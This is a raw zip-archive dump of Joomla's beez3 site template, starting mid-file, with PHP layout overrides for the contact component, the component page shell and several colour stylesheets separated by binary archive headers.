		<?php if ($this->params->get('presentation_style') === 'tabs') : ?>
			<?php echo JHtml::_('tabs.panel', JText::_('COM_CONTACT_OTHER_INFORMATION'), 'display-misc'); ?>
		<?php endif; ?>
		<?php if ($this->params->get('presentation_style') === 'plain'):?>
			<?php echo '<h3>'. JText::_('COM_CONTACT_OTHER_INFORMATION').'</h3>'; ?>
		<?php endif; ?>

		<div class="contact-miscinfo">
			<dl class="dl-horizontal">
				<dt>
					<span class="<?php echo $this->params->get('marker_class'); ?>">
						<?php echo $this->params->get('marker_misc'); ?>
					</span>
				</dt>
				<dd>
					<span class="contact-misc">
						<?php echo $this->contact->misc; ?>
					</span>
				</dd>
			</dl>
		</div>
	<?php endif; ?>

	<?php if ($this->params->get('presentation_style') === 'sliders') : ?>
		<?php echo JHtml::_('sliders.end'); ?>
	<?php elseif ($this->params->get('presentation_style') === 'tabs') : ?>
		<?php echo JHtml::_('tabs.end'); ?>
	<?php endif; ?>

	<?php echo $this->item->event->afterDisplayContent; ?>
</div>
PK՜�\!��]��=beez3/html/com_contact/contact/default_user_custom_fields.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   (C) 2016 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$params             = $this->params;

$displayGroups      = $params->get('show_user_custom_fields');
$userFieldGroups    = array();
?>

<?php if (!$displayGroups || !$this->contactUser) : ?>
	<?php return; ?>
<?php endif; ?>

<?php foreach ($this->contactUser->jcfields as $field) :?>
	<?php if (!in_array('-1', $displayGroups) && (!$field->group_id || !in_array($field->group_id, $displayGroups))) : ?>
		<?php continue; ?>
	<?php endif; ?>
	<?php if (!array_key_exists($field->group_title, $userFieldGroups)) : ?>
		<?php $userFieldGroups[$field->group_title] = array();?>
	<?php endif; ?>
	<?php $userFieldGroups[$field->group_title][] = $field;?>
<?php endforeach; ?>

<?php foreach ($userFieldGroups as $groupTitle => $fields) :?>
	<?php $id = JApplicationHelper::stringURLSafe($groupTitle); ?>
	<?php if ($this->params->get('presentation_style') === 'sliders') :
		echo JHtml::_('sliders.panel', $groupTitle ?: JText::_('COM_CONTACT_USER_FIELDS'), 'display-' . $id); ?>
	<?php endif; ?>
	<?php if ($this->params->get('presentation_style') === 'tabs') : ?>
		<?php echo JHtml::_('tabs.panel', $groupTitle ?: JText::_('COM_CONTACT_USER_FIELDS'), 'display-' . $id); ?>
	<?php endif; ?>
	<?php if ($this->params->get('presentation_style') === 'plain'):?>
		<?php echo '<h3>' . ($groupTitle ?: JText::_('COM_CONTACT_USER_FIELDS')) . '</h3>'; ?>
	<?php endif; ?>

	<div class="contact-profile" id="user-custom-fields-<?php echo $id; ?>">
		<dl class="dl-horizontal">
		<?php foreach ($fields as $field) :?>
			<?php if (!$field->value) : ?>
				<?php continue; ?>
			<?php endif; ?>

			<?php echo '<dt>' . $field->label . '</dt>'; ?>
			<?php echo '<dd>' . $field->value . '</dd>'; ?>
		<?php endforeach; ?>
		</dl>
	</div>

<?php endforeach; ?>
PK՜�\�A�	WW2beez3/html/com_contact/contact/default_profile.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>
<?php if (JPluginHelper::isEnabled('user', 'profile')) :
	$fields = $this->item->profile->getFieldset('profile'); ?>
<div class="contact-profile" id="users-profile-custom">
	<dl class="dl-horizontal">
	<?php foreach ($fields as $profile) :
		if ($profile->value) :
			echo '<dt>'.$profile->label.'</dt>';
			$profile->text = htmlspecialchars($profile->value, ENT_COMPAT, 'UTF-8');

			switch ($profile->id) :
				case 'profile_website' :
					$v_http = substr($profile->profile_value, 0, 4);

					if ($v_http === 'http') :
						echo '<dd><a href="'.$profile->text.'">'.$profile->text.'</a></dd>';
					else :
						echo '<dd><a href="http://'.$profile->text.'">'.$profile->text.'</a></dd>';
					endif;
					break;

				default:
					echo '<dd>'.$profile->text.'</dd>';
					break;
			endswitch;
		endif;
	endforeach; ?>
	</dl>
</div>
<?php endif; ?>
PK՜�\,J�770beez3/html/com_contact/contact/default_links.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

if ($this->params->get('presentation_style') === 'sliders') : ?>
	<?php echo JHtml::_('sliders.panel', JText::_('COM_CONTACT_LINKS'), 'display-links'); ?>
<?php endif; ?>
<?php if ($this->params->get('presentation_style') === 'tabs') : ?>
	<?php echo JHtml::_('tabs.panel', JText::_('COM_CONTACT_LINKS'), 'display-links'); ?>
<?php endif; ?>
<?php if  ($this->params->get('presentation_style') === 'plain'):?>
	<?php echo '<h3>'. JText::_('COM_CONTACT_LINKS').'</h3>'; ?>
<?php endif; ?>

<div class="contact-links">
	<ul class="nav nav-list">
		<?php foreach (range('a', 'e') as $char) :// letters 'a' to 'e'
			$link = $this->contact->params->get('link'.$char);
			$label = $this->contact->params->get('link'.$char.'_name');

			if (!$link) :
				continue;
			endif;

			// Add 'http://' if not present
			$link = (0 === strpos($link, 'http')) ? $link : 'http://'.$link;

			// If no label is present, take the link
			$label = $label ?: $link;
			?>
			<li>
				<a href="<?php echo $link; ?>">
					<?php echo $label; ?>
				</a>
			</li>
		<?php endforeach; ?>
	</ul>
</div>
PK՜�\�T���3beez3/html/com_contact/categories/default_items.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
$class = ' class="first"';
if ($this->maxLevelcat != 0 && count($this->items[$this->parent->id]) > 0) :
?>
<ul>
<?php foreach ($this->items[$this->parent->id] as $id => $item) : ?>
	<?php
	if ($item->numitems || $this->params->get('show_empty_categories_cat') || count($item->getChildren())) :
	if (!isset($this->items[$this->parent->id][$id + 1]))
	{
		$class = ' class="last"';
	}
	?>
	<li<?php echo $class; ?>>
	<?php $class = ''; ?>
		<span class="item-title"><a href="<?php echo JRoute::_(ContactHelperRoute::getCategoryRoute($item->id));?>">
			<?php echo $this->escape($item->title); ?></a>
		</span>

		<?php if ($this->params->get('show_subcat_desc_cat') == 1) :?>
		<?php if ($item->description) : ?>
			<div class="category-desc">
				<?php echo JHtml::_('content.prepare', $item->description, '', 'com_contact.categories'); ?>
			</div>
		<?php endif; ?>
		<?php endif; ?>

		<?php if ($this->params->get('show_cat_items_cat') == 1) :?>
			<dl><dt>
				<?php echo JText::_('COM_CONTACT_COUNT'); ?></dt>
				<dd><?php echo $item->numitems; ?></dd>
			</dl>
		<?php endif; ?>

		<?php if (count($item->getChildren()) > 0) :
			$this->items[$item->id] = $item->getChildren();
			$this->parent = $item;
			$this->maxLevelcat--;
			echo $this->loadTemplate('items');
			$this->parent = $item->getParent();
			$this->maxLevelcat++;
		endif; ?>

	</li>
	<?php endif; ?>
<?php endforeach; ?>
</ul>
<?php endif; ?>
PK՜�\���''-beez3/html/com_contact/categories/default.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   (C) 2012 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT.'/helpers');

JHtml::_('behavior.caption');
?>
<div class="categories-list<?php echo $this->pageclass_sfx;?>">
<?php if ($this->params->get('show_page_heading')) : ?>
<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
</h1>
<?php endif; ?>
	<?php if ($this->params->get('show_base_description')) : ?>
	<?php 	//If there is a description in the menu parameters use that; ?>
		<?php if ($this->params->get('categories_description')) : ?>
		<div class="category-desc base-desc">
			<?php echo  JHtml::_('content.prepare', $this->params->get('categories_description'), '', 'com_contact.categories'); ?>
			</div>
		<?php  else: ?>
			<?php //Otherwise get one from the database if it exists. ?>
			<?php  if ($this->parent->description) : ?>
				<div class="category-desc base-desc">
					<?php  echo JHtml::_('content.prepare', $this->parent->description, '', 'com_contact.categories'); ?>
				</div>
			<?php  endif; ?>
		<?php  endif; ?>
	<?php endif; ?>
<?php
echo $this->loadTemplate('items');
?>
</div>
PK՜�\����beez3/component.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2010 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/** @var JDocumentHtml $this */

$color = $this->params->get('templatecolor');

// Output as HTML5
$this->setHtml5(true);

// Add html5 shiv
JHtml::_('script', 'jui/html5.js', array('version' => 'auto', 'relative' => true, 'conditional' => 'lt IE 9'));

// Add stylesheets
JHtml::_('stylesheet', 'templates/system/css/system.css', array('version' => 'auto'));
JHtml::_('stylesheet', 'template.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', 'position.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', 'layout.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', 'print.css', array('version' => 'auto', 'relative' => true), array('media' => 'print'));
JHtml::_('stylesheet', 'general.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', htmlspecialchars($color, ENT_COMPAT, 'UTF-8') . '.css', array('version' => 'auto', 'relative' => true));

if ($this->direction === 'rtl')
{
	JHtml::_('stylesheet', 'template_rtl.css', array('version' => 'auto', 'relative' => true));
	JHtml::_('stylesheet', htmlspecialchars($color, ENT_COMPAT, 'UTF-8') . '_rtl.css', array('version' => 'auto', 'relative' => true));
}

JHtml::_('stylesheet', 'ieonly.css', array('version' => 'auto', 'relative' => true, 'conditional' => 'lte IE 6'));

// Check for a custom CSS file
JHtml::_('stylesheet', 'user.css', array('version' => 'auto', 'relative' => true));
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<jdoc:include type="head" />
</head>
<body class="contentpane">
	<div id="all">
		<div id="main">
			<jdoc:include type="message" />
			<jdoc:include type="component" />
		</div>
	</div>
</body>
</html>
PK՜�\�˴�;#;#beez3/css/turq.cssnu�[���body {
	background: #eeeeee;
}
h3 {
	color: #555;
}
h2 a {
	text-decoration: none;
}
h2,
.moduletable h3,
.items-leading h2 {
	border-bottom: solid 1px #ddd;
}
.items-row h2 {
	border-top: solid 1px #ddd;
	border-bottom: solid 1px #ddd;
}
a:link,
a:visited {
	color: #009999;
}
a:hover,
a:active,
a:focus {
	background: #009999;
	color: #FFF;
}
.logoheader {
	background: #009999;
	color: #FFFFFF;
	min-height: 200px;
}
#all {
	background: #fff;
	color: #555;
}
#shadow #all {
	box-shadow: 0px 20px 10px #555555;
}
#header ul.menu {
	background-color: #ddd;
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#eee,endColorstr=#ddd);
	background-image: -khtml-gradient(linear,left top,left bottom,from(#eee),to(#ddd));
	background-image: -moz-linear-gradient(top,#eee,#ddd);
	background-image: -ms-linear-gradient(top,#eee,#ddd);
	background-image: -webkit-gradient(linear,left top,left bottom,color-stop(0%,#eee),color-stop(100%,#ddd));
	background-image: -webkit-linear-gradient(top,#eee,#ddd);
	background-image: -o-linear-gradient(top,#eee,#ddd);
	background-image: linear-gradient(#eee,#ddd);
	border-color: #b2b2b2 #b2b2b2 #9f9f9f;
	text-shadow: 0 1px 1px rgba(255,255,255,0.49);
	-webkit-font-smoothing: antialiased;
	box-shadow: 0 1px 0 rgba(255,255,255,0.2) inset, 0 1px 2px rgba(0,0,0,0.05);
	border: solid 1px #ddd;
	border: 1px solid #e5e5e5;
	text-transform: uppercase;
}
#header ul.menu a:link,
#header ul.menu a:visited {
	color: #333;
	font-weight: bold;
	text-decoration: none;
	padding: 0px 10px;
	margin: 0;
	display: inline-block;
	margin: 0 0 0;
	padding: 12px 15px;
	position: relative;
	border-right: 1px solid #ddd;
	box-shadow: 1px 0px 0px #f5f5f5;
}
.button,
button,
p.readmore a,
#header input.button,
.pagenav a:link,
.pagenav a:visited,
#advanced-search-toggle,
.profile-edit a:link,
.profile-edit a:visited,
h3.js_heading,
.article-info {
	background-color: #ddd;
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#ffffff,endColorstr=#dddddd);
	background-image: -khtml-gradient(linear,left top,left bottom,from(#ffffff),to(#dddddd));
	background-image: -moz-linear-gradient(top,#ffffff,#dddddd);
	background-image: -ms-linear-gradient(top,#ffffff,#dddddd);
	background-image: -webkit-gradient(linear,left top,left bottom,color-stop(0%,#ffffff),color-stop(100%,#dddddd));
	background-image: -webkit-linear-gradient(top,#ffffff,#dddddd);
	background-image: -o-linear-gradient(top,#ffffff,#dddddd);
	background-image: linear-gradient(#ffffff,#dddddd);
	border-color: #b2b2b2 #b2b2b2 #9f9f9f;
	text-shadow: 0 1px 1px rgba(255,255,255,0.49);
	-webkit-font-smoothing: antialiased;
	box-shadow: 0 1px 0 rgba(255,255,255,0.2) inset, 0 1px 2px rgba(0,0,0,0.05);
	color: #009999;
	border: solid 1px #ddd;
}
.article-info {
	color: #555;
}
table {
	border: solid 1px #ddd;
}
table th a:link,
table th a:visited {
	color: #fff;
}
tr.odd,
tr.cat-list-row1 {
	background: #f8f8f8;
}
table  tr:hover td {
	background: #FEFDE2;
}
.button:hover,
.button:active,
.button:focus,
button:hover,
p.readmore a:hover,
#header ul.menu a:hover,
#header ul.menu a:active,
#header ul.menu a:focus,
.pagenav a:hover,
.pagenav a:active,
.pagenav a:focus,
#advanced-search-toggle:hover,
#advanced-search-toggle:active,
#advanced-search-toggle:focus,
.profile-edit a:hover,
.profile-edit a:active,
.profile-edit a:focus,
#fontsize a:hover,
#fontsize a:active,
#fontsize a:focus,
#mobile_select h2 a,
table th,
.logoheader {
	background-color: #00B9B9;
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#00B9B9,endColorstr=#009999);
	background-image: -khtml-gradient(linear,left top,left bottom,from(#00B9B9),to(#009999));
	background-image: -moz-linear-gradient(top,#00B9B9,#009999);
	background-image: -ms-linear-gradient(top,#00B9B9,#009999);
	background-image: -webkit-gradient(linear,left top,left bottom,color-stop(0%,#00B9B9),color-stop(100%,#009999));
	background-image: -webkit-linear-gradient(top,#00B9B9,#009999);
	background-image: -o-linear-gradient(top,#00B9B9,#009999);
	background-image: linear-gradient(#00B9B9,#009999);
	border-color: #009999;
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.33);
	-webkit-font-smoothing: antialiased;
}
input:focus,
textarea:focus {
	box-shadow: 0 1px 1px #ddd inset, 0 0 8px #00B9B9;
	outline: 0 none;
}
.pagination span,
.pagination span  a:hover {
	color: #999999;
	background-color: #f5f5f5;
}
span.pagenav {
	background: #009999;
	color: #fff;
}
.pagination-start span.pagenav,
.pagination-prev  span.pagenav,
.pagination-end span.pagenav,
.pagination-next span.pagenav {
	background-color: #f5f5f5;
	color: #444;
}
ul.menu a:link,
ul.menu a:visited {
	color: #444;
}
.moduletable_menu {
	border: solid 1px #ddd;
	background: #f9f9f9;
}
#header ul.menu {
	border: solid 1px #D5D5D5;
	box-shadow: 0 1px 0 #FFFFFF inset, 0 1px 5px rgba(0,0,0,0.1);
}
#header ul.menu a {
	box-shadow: none;
	border-bottom: 0;
}
ul.menu a:hover,
ul.menu a:active,
ul.menu a:focus {
	background-color: #F5F5F5;
	background-image: -moz-linear-gradient(center top,#FFFFFF,#E6E6E6);
	background-repeat: repeat-x;
	background: url(../images/arrow.png) no-repeat right center;
	color: #009999;
}
ul.menu li.active a,
ul.menu  li.active ul li.active a,
ul.menu  li.active ul li.active  ul li.active a,
ul.menu  li.active ul li.active  ul li.active ul li.active  a,
ul.menu  li.active ul li.active  ul li.active ul li.active ul li.active a {
	font-weight: bold;
}
ul.menu  li.active ul li a,
ul.menu  li.active ul li.active  ul li a,
ul.menu  li.active ul li.active  ul li.active ul li  a,
ul.menu  li.active ul li.active  ul li.active ul li.active ul li a {
	font-weight: normal;
}
ul.menu a {
	box-shadow: 0 1px 0 #fff;
	border-bottom: solid 1px #ddd;
	text-shadow: 0 1px 0 #fff;
}
ul.menu ul a {
	background: #e5e5e5;
	margin-bottom: 1px;
}
ul.menu ul ul ul a {
	background: #f5f5f5 url(../images/arrow.png) no-repeat 24px center;
}
ul.menu ul ul ul ul a {
	background: #fff;
}
.panel h3.pane-toggler a {
	background: url(../images/slider_plus.png) right top no-repeat;
	color: #333;
}
.panel h3.pane-toggler-down a {
	background: url(../images/slider_minus.png) right top no-repeat;
	border-bottom: solid 1px #ddd;
	color: #333;
}
ul.tabs li,
dl.tabs dt h3 a:link,
dl.tabs dt h3 a:visited {
	background: #f5f5f5 url(../images/nature/box.png) repeat-x;
}
ul.tabs li a:link,
ul.tabs li a:visited,
dl.tabs dt a {
	color: #333;
	border: solid 1px #ddd;
	border-bottom: 0;
}
ul.tabs li a:hover,
ul.tabs li a:active,
ul.tabs li a:focus {
	color: #000;
}
.tabcontent,
div.current {
	background: #fff;
	color: #000;
	border: solid 1px #ddd;
}
.tabcontent .linkclosed {
	color: #000;
	border-bottom: solid 1px #e5e5e5;
}
ul.tabs li a.linkopen,
dl.tabs dt.open  h3 a:link,
dl.tabs dt.open  h3 a:visited {
	background: #fff;
	color: #333;
	border-radius: 5px 5px 0px 0px;
}
ul.tabs li a.linkclosed:hover,
ul.tabs li a.linkclosed:active,
ul.tabs li a.linkclosed:focus,
ul.tabs li a.linkopen:hover,
ul.tabs li a.linkopen:active,
ul.tabs li a.linkopen:focus {
	background: #555;
	color: #fff;
}
#footer-inner,
#footer {
	background: #f5f5f5;
	box-shadow: 0px 20px 10px #555;
}
#footer {
	background: #555;
	max-width: 1025px;
	margin: 0 auto;
	box-shadow: 0px 0px 10px #555555;
	color: #fff;
}
#footer a {
	color: #fff;
	background: none;
}
#bottom a {
	background: none;
}
.box1 {
	border-right: solid 1px #ccc;
}
.box3 {
	border-left: solid 1px #ccc;
}
#bottom  ul li a {
	background-image: none;
	padding-left: 0;
}
#mobile_select h2 {
	border: 0;
	margin: -17px 0 0 0;
	padding: 0;
	background: #009999;
	text-align: right;
}
#mobile_select h2 a {
	display: inline-block;
	font-size: 0.8em;
	border-radius: 4px 4px 0 0;
	padding: 6px;
	font-size: 0.75em;
	margin-right: 5px;
}
@media only screen and (max-width: 480px) {
	img {
		max-width: 100%;
		height: auto;
		border: 0;
		-ms-interpolation-mode: bicubic;
	}
	#fontsize {
		display: none;
	}
	#nav,
	#wrapper2,
	#wrapper,
	.cols-3 .column-1,
	.cols-3 .column-2,
	.cols-3 .column-3,
	#right,
	.box,
	#header form {
		float: none;
		width: 100%;
	}
	#header {
		padding-top: 3em;
	}
	#header form {
		margin: 0;
	}
	.logoheader {
		background: #009999;
		min-height: 100px;
		margin: 0;
	}
	.box {
		border-left: 0 !important;
		border-bottom: solid 1px #ddd;
	}
	#line {
		text-align: center;
		top: 0;
		right: auto;
		max-width: 100%;
		min-width: 100%;
		margin: 0 0px;
		background: #00B9B9;
	}
	#header form input {
		float: none;
		margin-bottom: 4px;
	}
	#menuwrapper {
		margin-top: 10px;
	}
	#header ul.menu {
		position: relative;
		top: 0;
		left: 20px;
		right: 20px;
		margin: 0;
		width: 90%;
		border-radius: 4px;
	}
	#header ul.menu li:first-child a {
		border-radius: 4px 4px 0 0;
	}
	#header ul.menu li:last-child a {
		border-radius: 0 0 4px 4px;
	}
	#header ul.menu li a:link,
	#header ul.menu li a:visited {
		display: block;
		padding: 6px 10px;
		border-bottom: solid 1px #ccc;
	}
}
PK՜�\�0���beez3/css/nature_rtl.cssnu�[���h1#logo {
	padding: 0.6em 20px 10px 10px;
}

#header ul.menu {
	left: 0;
	right: auto;
}
#logo span {
    padding-right: 2px;
}
PK՜�\)�""beez3/css/personal_rtl.cssnu�[���h1#logo {
	margin-right: 90px;
}

PK՜�\�Hd-d-beez3/css/personal.cssnu�[���body {
	background: #eee
}

h3 {
	color: #555
}

h2 a {
	text-decoration: none
}

h2,.moduletable h3, .items-leading h2 {
	border-bottom: solid 1px #ddd;
}

.items-row h2 {
	border-top: solid 1px #ddd;
	border-bottom: solid 1px #ddd;
}

a:link,a:visited {
	color: #095197
}

a:hover,a:active,a:focus {
	background: #095197;
	color: #FFF;
}

.logoheader {
	background: url(../images/personal/personal2.png) no-repeat right
		bottom #0C1A3E;
	color: #FFFFFF;
	min-height: 250px;
}

#all {
	background: #FFFFFF;
	color: #444;
}

#shadow #all {
	box-shadow: 0px 20px 10px #555555
}

#header ul.menu {
  background-color:#ddd;
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#eeeeee", endColorstr="#dddddd");
  background-image: -khtml-gradient(linear, left top, left bottom, from(#eeeeee), to(#dddddd));
  background-image: -moz-linear-gradient(top, #eeeeee, #dddddd);
  background-image: -ms-linear-gradient(top, #eeeeee, #dddddd);
  background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #eeeeee), color-stop(100%, #dddddd));
  background-image: -webkit-linear-gradient(top, #eeeeee, #dddddd);
  background-image: -o-linear-gradient(top, #eeeeee, #dddddd);
  background-image: linear-gradient(#eeeeee, #dddddd);
  border-color: #b2b2b2 #b2b2b2 hsl(114, 0%, 62.5%);

  text-shadow: 0 1px 1px rgba(255, 255, 255, 0.49);
  -webkit-font-smoothing: antialiased;
	box-shadow: 0 1px 0 rgba(255, 255, 255, 0.2) inset, 0 1px 2px
		rgba(0, 0, 0, 0.05);
	color: #095197;
	border: solid 1px #ddd;
	border: 1px solid #e5e5e5;
	text-transform: uppercase;
}

#header ul.menu a:link,#header ul.menu a:visited {
	color: #333;
	display: inline-block;
	font-weight: bold;
	text-decoration: none;
	padding: 0px 10px;
	margin: 0;
	display: inline-block;
	margin: 0 0 0;
	padding: 12px 15px;
	position: relative;
	border-right: 1px solid #ddd;
	box-shadow: 1px 0px 0px #f5f5f5;
}

/*  grey background */
.button,button,p.readmore a,#header input.button,.pagenav a:link,.pagenav a:visited,#advanced-search-toggle,.profile-edit a:link,.profile-edit a:visited,h3.js_heading
	{
  background-color:#ddd;
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#ffffff", endColorstr="#dddddd");
  background-image: -khtml-gradient(linear, left top, left bottom, from(#ffffff), to(#dddddd));
  background-image: -moz-linear-gradient(top, #ffffff, #dddddd);
  background-image: -ms-linear-gradient(top, #ffffff, #dddddd);
  background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #ffffff), color-stop(100%, #dddddd));
  background-image: -webkit-linear-gradient(top, #ffffff, #dddddd);
  background-image: -o-linear-gradient(top, #ffffff, #dddddd);
  background-image: linear-gradient(#ffffff, #dddddd);
  border-color: #b2b2b2 #b2b2b2 hsl(114, 0%, 62.5%);

  text-shadow: 0 1px 1px rgba(255, 255, 255, 0.49);
  -webkit-font-smoothing: antialiased;
	box-shadow: 0 1px 0 rgba(255, 255, 255, 0.2) inset, 0 1px 2px
		rgba(0, 0, 0, 0.05);
	color: #095197;
	border: solid 1px #ddd
}

/* +++++++++++++  table display  Categories table, contact etc, ++++++++++++++++++++* */
table {
	border: solid 1px #ddd
}

table th {
	background-color: #0074cc;
	color: #fff;
	background-image: -moz-linear-gradient(top, #095197, #1B6BA5);
	background-image: -ms-linear-gradient(top, #095197, #1B6BA5);
	background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#095197),
		to(#1B6BA5) );
	background-image: -webkit-linear-gradient(top, #095197, #1B6BA5);
	background-image: -o-linear-gradient(top, #095197, #1B6BA5);
	background-image: linear-gradient(top, #095197, #1B6BA5);
	background-repeat: repeat-x;
	filter: progid :   DXImageTransform.Microsoft.gradient (   startColorstr
		=
		 '#095197', endColorstr =   '#1B6BA5', GradientType =   0 );
	border-color: #0055cc #0055cc #003580;
	border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);
	filter: progid :   dximagetransform.microsoft.gradient (   enabled =
		false );
}

table th a:link,table th a:visited {
	color: #fff
}

tr.odd,tr.cat-list-row1 {
	background: #f8f8f8
}

table  tr:hover td {
	background: #FEFDE2;
}

/* blue background */
.button:hover,
.button:active,
.button:focus,
button:hover,
p.readmore a:hover,
#header ul.menu a:hover,
#header ul.menu a:active,
#header ul.menu a:focus,
.pagenav a:hover,
.pagenav a:active,
.pagenav a:focus,
#advanced-search-toggle:hover,
#advanced-search-toggle:active,
#advanced-search-toggle:focus,
.profile-edit a:hover,
.profile-edit a:active,
.profile-edit a:focus,
#fontsize a:hover,#fontsize a:active,#fontsize a:focus,
#mobile_select h2 a
	{
	background-color: #000000;
	color: #fff;

  background-color:#095197;
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#0087d1", endColorstr="#095197");
  background-image: -khtml-gradient(linear, left top, left bottom, from(#0087d1), to(#095197));
  background-image: -moz-linear-gradient(top, #0087d1, #095197);
  background-image: -ms-linear-gradient(top, #0087d1, #095197);
  background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #0087d1), color-stop(100%, #095197));
  background-image: -webkit-linear-gradient(top, #0087d1, #095197);
  background-image: -o-linear-gradient(top, #0087d1, #095197);
  background-image: linear-gradient(#0087d1, #095197);
  border-color: #00456b #095197 hsl(201, 100%, 16%);
  color: #fff ;
  text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.33);
  -webkit-font-smoothing: antialiased;



}

/* +++++++++++++++++  Pagination +++++++++++++++ */
.pagination span,.pagination span  a:hover {
	color: #999999;
	background-color: #f5f5f5;
}

/* active item */
span.pagenav {
	background: #095197;
	color: #fff
}

.pagination-start span.pagenav,.pagination-prev  span.pagenav,.pagination-end span.pagenav,.pagination-next span.pagenav
	{
	background-color: #f5f5f5;
	color: #444
}

/* +++++++++++++++++  content  +++++++++++++++ */
.article-info {
	background-color: #fbfbfb;
	background-image: -moz-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: -ms-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#ffffff),
		to(#f5f5f5) );
	background-image: -webkit-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: -o-linear-gradient(top, #ffffff, #f5f5f5);
	background-image: linear-gradient(top, #ffffff, #f5f5f5);
	background-repeat: repeat-x;
	filter: progid :   DXImageTransform.Microsoft.gradient (   startColorstr
		=
		 '#ffffff', endColorstr =   '#f5f5f5', GradientType =   0 );
	border: 1px solid #ddd;
	-webkit-box-shadow: inset 0 1px 0 #ffffff;
	-moz-box-shadow: inset 0 1px 0 #ffffff;
	box-shadow: inset 0 1px 0 #ffffff;
}

ul.menu a:link,ul.menu a:visited {
	color: #444;
}

/* ++++++++++++++++++++++  menu ++++++++++++++++++++++++++  */
.moduletable_menu {
	border: solid 1px #ddd;
	background: #f9f9f9;
}

#header ul.menu {
	border: solid 1px #D5D5D5;
	box-shadow: 0 1px 0 #FFFFFF inset, 0 1px 5px rgba(0, 0, 0, 0.1);
}

#header ul.menu a {
	box-shadow: none;
	border-bottom: 0
}

ul.menu a:hover,ul.menu a:active,ul.menu a:focus {
	background-color: #F5F5F5;
	background-image: -moz-linear-gradient(center top, #FFFFFF, #E6E6E6);
	background-repeat: repeat-x;
	background: url(../images/arrow.png) no-repeat right center;
	color: #095197
}

/* ++++++++++++++++   highlighting active menuitem  +++++++++++++++++++ */
ul.menu li.active a,ul.menu  li.active ul li.active a,ul.menu  li.active ul li.active  ul li.active a,ul.menu  li.active ul li.active  ul li.active ul li.active  a,ul.menu  li.active ul li.active  ul li.active ul li.active ul li.active a
	{
	font-weight: bold;
}

ul.menu  li.active ul li a,ul.menu  li.active ul li.active  ul li a,ul.menu  li.active ul li.active  ul li.active ul li  a,ul.menu  li.active ul li.active  ul li.active ul li.active ul li a
	{
	font-weight: normal
}

ul.menu a {
	box-shadow: 0 1px 0 #fff;
	border-bottom: solid 1px #ddd;
	text-shadow: 0 1px 0 #fff
}

ul.menu ul a {
	background: #e5e5e5;
	margin-bottom: 1px
}

ul.menu ul ul ul a {
	background: #f5f5f5 url(../images/arrow.png) no-repeat 24px center;
}

ul.menu ul ul ul ul a {
	background: #fff;
}

/* +++++++++++++++++++++++  SLIDER  ++++++++++++++++++++  */
.panel h3.pane-toggler a {
	background: url(../images/slider_plus.png) right top no-repeat;
	color: #333
}

.panel h3.pane-toggler-down a {
	background: url(../images/slider_minus.png) right top no-repeat;
	border-bottom: solid 1px #ddd;
	color: #333
}

/*  +++++++++++++++++   Tabs ++++++++++++++++++++++  */
ul.tabs li,dl.tabs dt h3 a:link,dl.tabs dt h3 a:visited {
	background: #f5f5f5 url(../images/nature/box.png) repeat-x;
}

ul.tabs li a:link,ul.tabs li a:visited,dl.tabs dt a {
	color: #333;
	border: solid 1px #ddd;
	border-bottom: 0
}

ul.tabs li a:hover,ul.tabs li a:active,ul.tabs li a:focus {
	color: #000
}

.tabcontent,div.current {
	background: #fff;
	color: #000;
	border: solid 1px #ddd;
}

.tabcontent .linkclosed {
	color: #000;
	border-bottom: solid 1px #e5e5e5;
}

ul.tabs li a.linkopen,dl.tabs dt.open  h3 a:link,dl.tabs dt.open  h3 a:visited
	{
	background: #fff;
	color: #333;
	border-radius: 5px 5px 0px 0px;
}

